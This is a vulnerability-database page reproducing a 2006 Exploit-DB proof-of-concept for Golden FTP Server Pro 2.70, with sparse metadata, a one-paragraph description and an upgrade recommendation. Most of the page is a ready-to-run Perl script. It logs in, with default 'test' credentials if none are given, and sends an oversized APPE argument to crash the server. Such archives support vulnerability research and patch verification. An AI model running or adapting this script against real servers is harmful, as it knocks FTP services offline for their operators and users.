Golden FTP Server Pro 2.70 Remote APPE command PoC exploit : DoS

vendor:

Golden FTP Server Pro

by:

7,5

CVSS

HIGH

DoS

N/A

CWE

Product Name: Golden FTP Server Pro

Affected Version From: 2.70

Affected Version To: 2.70

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Golden FTP Server Pro 2.70 Remote APPE command PoC exploit : DoS

This exploit is a proof of concept for a denial of service vulnerability in Golden FTP Server Pro 2.70. It uses the APPE command to send a string of 1000 characters to the server, causing it to crash. The exploit requires the host and port of the server to be specified, as well as optional username and password credentials.

Mitigation:

Upgrade to a version of Golden FTP Server Pro that is not vulnerable to this exploit.

Source

Exploit-DB raw data:

#!/usr/bin/perl

#
-----------------------------------------------------------------------------------------
# Golden FTP Server Pro 2.70 Remote APPE command PoC exploit : DoS
# /JA
# https://www.securinfos.info
#
-----------------------------------------------------------------------------------------

use Net::FTP;

$host = @ARGV[0];
$port = @ARGV[1];
$debug = @ARGV[2];
$user = @ARGV[3];
$pass = @ARGV[4];

if (($host) && ($port)) {

# Exploit string (try with a different value if needed)
$exploit_string = "./A" x 1000;

      print "Trying to connect to $host:$port\n";
      $sock = Net::FTP->new("$host",Port => $port, TimeOut => 60, Debug=> $debug) or die "[-] Connection failed\n";
      print "[+] Connect OK!\n";
      print "Logging...\n";
      if (!$user) {
           $user = "test";
           $pass = "test";
      }
      $sock->login($user, $pass);
      sleep(1);
      $answer = $sock->message;
      print $answer ."\n";
      print "Sending string...\n";
      $sock->quot("APPE",$exploit_string);
} else {
      print "Golden FTP Server Pro 2.70 - Remote APPE command PoC
exploit : DoS\nhttps://www.securinfos.info\n\nUsing: $0 host port [debug: 1 or 0] username password\n\n";
}

# milw0rm.com [2006-05-03]